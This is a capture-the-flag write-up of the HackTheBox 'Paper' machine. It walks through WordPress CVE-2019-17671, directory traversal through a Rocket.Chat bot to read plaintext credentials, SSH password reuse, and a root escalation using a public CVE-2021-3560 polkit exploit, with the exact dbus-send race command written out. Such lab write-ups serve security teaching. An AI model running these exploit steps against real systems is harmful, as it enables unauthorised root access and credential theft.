
nihilist - 30 / 08 / 2022

Paper Writeup

Introduction :



Paper is an easy HackTheBox machine released back in February 2022.

Part 1 : Initial Enumeration



As always, we begin our enumeration with Nmap to find open ports, using the flags -sC for default scripts and -sV for version detection (combined as -sCV below).


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping paper.htb
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
^C
--- paper.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ nmap -sCV paper.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
Nmap scan report for paper.htb (10.129.136.31)
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds

Part 2 : Getting User Access



Our nmap scan picked up port 80 running Apache 2.4.37, most likely on CentOS. When we curl port 80, the 403 response carries an X-Backend-Server header that discloses another domain name:


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ curl -v http://paper.htb
*   Trying 10.129.136.31:80...
* Connected to paper.htb (10.129.136.31) port 80 (#0)
> GET / HTTP/1.1
> Host: paper.htb
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Date: Tue, 30 Aug 2022 18:31:07 GMT
< Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
< X-Backend-Server: office.paper
< Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
< ETag: "30c0b-5c5c7fdeec240"
< Accept-Ranges: bytes
< Content-Length: 199691
< Content-Type: text/html; charset=UTF-8
<

So we add the domain office.paper to our /etc/hosts file:


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ cat /etc/hosts | grep paper
10.129.136.31 paper.htb office.paper

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ping office.paper
PING paper.htb (10.129.136.31) 56(84) bytes of data.
64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms

Let's enumerate other subdomains (virtual hosts) using wfuzz, fuzzing the Host header with a wordlist and hiding the 403 responses:


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w  /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://office.paper/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000070:   200        507 L    13015 W    223163 Ch   "chat"
^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...

Total time: 5.887163
Processed Requests: 192
Filtered Requests: 191
Requests/sec.: 32.61332

wfuzz found the chat.office.paper subdomain, so we add it to our /etc/hosts file as well and browse to it:

Here we find a Rocket.Chat instance. We will come back to it once we have credentials; for now we return to the site at office.paper:

Browsing to http://office.paper/wp-admin reveals that it is a WordPress site, so we run wpscan:


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ wpscan --url http://office.paper
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 30 20:47:20 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 30 20:47:25 2022
[+] Requests Done: 185
[+] Cached Requests: 5
[+] Data Sent: 44.421 KB
[+] Data Received: 18.75 MB
[+] Memory used: 227.438 MB
[+] Elapsed time: 00:00:04

This WordPress 5.2.3 instance is vulnerable to CVE-2019-17671, a bug that lets an unauthenticated visitor view posts that are not shown publicly by appending the query parameter ?static=1, which reveals all the other posts:

Here a secret post reveals the secret registration link for the chat, so let's use it to create an account:

Once we log in, we can see the following info:

Basically there is a bot called recyclops that we can reach via DM and give commands to:

We can list files with the command "list":

And with directory traversal (../) in the path given to "list", we see that there is a user on the box called "dwight".

Going just one directory up we find the hubot directory, which contains a .env file with plaintext credentials: recyclops/Queenofblad3s!23. Let's check for password reuse with the user dwight over SSH:


[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SSH         paper.htb       22     office.paper     [*] SSH-2.0-OpenSSH_8.0
SSH         paper.htb       22     office.paper     [+] dwight:Queenofblad3s!23

[ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
→ ssh dwight@office.paper
The authenticity of host 'office.paper (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
dwight@office.paper's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ cat user.txt
a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we managed to log in and get the user flag!

Part 3 : Getting Root Access



Now, in order to escalate privileges, let's enumerate the possible privesc paths with linpeas.sh, downloaded on our machine and served to the box over HTTP:


[term1]
[dwight@paper ~]$ which wget curl
/usr/bin/wget
/usr/bin/curl

[term2]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
--2022-08-30 21:12:52--  https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2022-08-30 21:12:53--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220830T191251Z&X-Amz-Expires=300&X-Amz-Signature=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                                      100%[=======================================================================================================================================================>] 788.29K  4.40MB/s    in 0.2s

2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205]


[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[term1]
[dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
--2022-08-30 15:13:45--  http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 807205 (788K) [application/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                                      100%[=======================================================================================================================================================>] 788.29K  2.00MB/s    in 0.4s

2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205]

[dwight@paper ~]$ chmod +x linpeas.sh
[dwight@paper ~]$ ./linpeas.sh

Here linpeas.sh reports that the sudo binary may be affected by the heap buffer overflow nicknamed "Baron Samedit". To check whether it is vulnerable, we run sudoedit -s /: if it returns "sudoedit: /: not a regular file" the binary is vulnerable, whereas a patched sudo prints the usage message:


[dwight@paper ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...

It's not (we get the usage message). However, linpeas.sh also flagged that the box is vulnerable to CVE-2021-3560 (the polkit privilege escalation), so let's exploit it with a public PoC as follows:


[term1]
[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
--2022-08-30 21:29:20--  https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/plain]
Saving to: ‘CVE-2021-3560.py’

CVE-2021-3560.py                                                100%[=======================================================================================================================================================>]   2.74K  --.-KB/s    in 0.001s

2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]


[ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -

[term2]
[dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
--2022-08-30 15:29:44--  http://10.10.14.13:9090/CVE-2021-3560.py
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2803 (2.7K) [text/x-python]
Saving to: ‘CVE-2021-3560.py’

CVE-2021-3560.py                                                100%[=======================================================================================================================================================>]   2.74K  --.-KB/s    in 0s

2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]

[dwight@paper ~]$ which python python3
/usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
/usr/bin/python3
[dwight@paper ~]$ python3 CVE-2021-3560.py

##############CVE-2021-3560##############
# __________      .__   __   .__  __    #
# \______   \____ |  | |  | _|__|/  |_  #
#  |     ___/  _ \|  | |  |/ /  \   __\ #
#  |    |  (  <_> )  |_|     |  ||  |   #
#  |____|   \____/|____/__|_ \__||__|   #
#                           \/          #
#   Local Privilege Escalation Exploit  #
# Author: Salman Asad (@deathflash1411) #
#########################################

[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
[dwight@paper ~]$

So let's follow the script's instructions:


[dwight@paper ~]$ python3 CVE-2021-3560.py

##############CVE-2021-3560##############
[+] User created!
[+] Username: flash
[+] User ID: 1005
[!] Run the below command a few times (<10) and login via su - flash

[dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
[dwight@paper ~]$ su - flash
Password:
[flash@paper ~]$ id
uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
[flash@paper ~]$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for flash:
[root@paper flash]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper flash]# cat /root/root.txt
2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag!

Conclusion



Here we can see the progress graph :